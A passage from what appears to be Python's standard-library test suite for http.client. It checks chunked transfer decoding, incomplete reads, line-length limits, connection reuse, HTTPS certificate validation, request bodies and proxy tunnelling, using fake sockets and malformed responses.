resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test httpresponse with no \r\n termination,
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.addCleanup(serv.close)
serv.bind((HOST, 0))
serv.listen()
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with support.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
h.request('GET', '/')
resp = h.getresponse()
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
self.conn.sock = self.sock
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to send chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
